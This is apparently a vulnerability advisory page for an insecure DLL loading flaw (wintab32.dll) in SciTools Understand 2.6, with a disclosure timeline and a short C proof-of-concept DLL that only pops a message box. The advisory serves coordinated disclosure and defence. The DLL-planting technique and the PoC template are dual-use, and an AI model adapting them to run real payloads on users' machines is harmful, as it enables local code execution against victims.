SciTools Understand 2.6 DLL Loading Code Execution

Risk: Medium
Local: Yes
Remote: No

/* SciTools Understand 2.6 (wintab32.dll) DLL Loading Arbitrary Code Execution Vendor: Scientific Toolworks, Inc. Product web page: Affected version: 2.6 (build 598) Summary: Understand is a static analysis tool for maintaining, measuring, and analyzing critical or large code bases. Desc: The vulnerability is caused due to the application loading libraries (wintab32.dll) in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into opening an Understand Project file (.UDB) located on a remote WebDAV or SMB share. Tested on: Microsoft Windows XP Professional SP3 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Vendor status: [29.01.2012] Vulnerability discovered. [30.01.2012] Contact with the vendor. [30.01.2012] Vendor replies with e-mail info for their european partner. [30.01.2012] Contacted the new e-mail given with sent details and PoC code. [31.01.2012] Vendor answers and sends the report to the appropriate division. [31.01.2012] Asked vendor for confirmation and scheduled patch release date. [02.02.2012] Vendor responds with confirmation and a scheduled release for a fix. [08.02.2012] Vendor releases patched version 2.6.600 (Build 600): [08.02.2012] Coordinated public security advisory released. Advisory ID: ZSL-2012-5071 Advisory URL: Vendor advisory: 29.01.2012 */ #include <windows.h> BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_mll(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_mll() { MessageBox(0, "DLL Flownapped!", "DLL Message", MB_OK); }


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top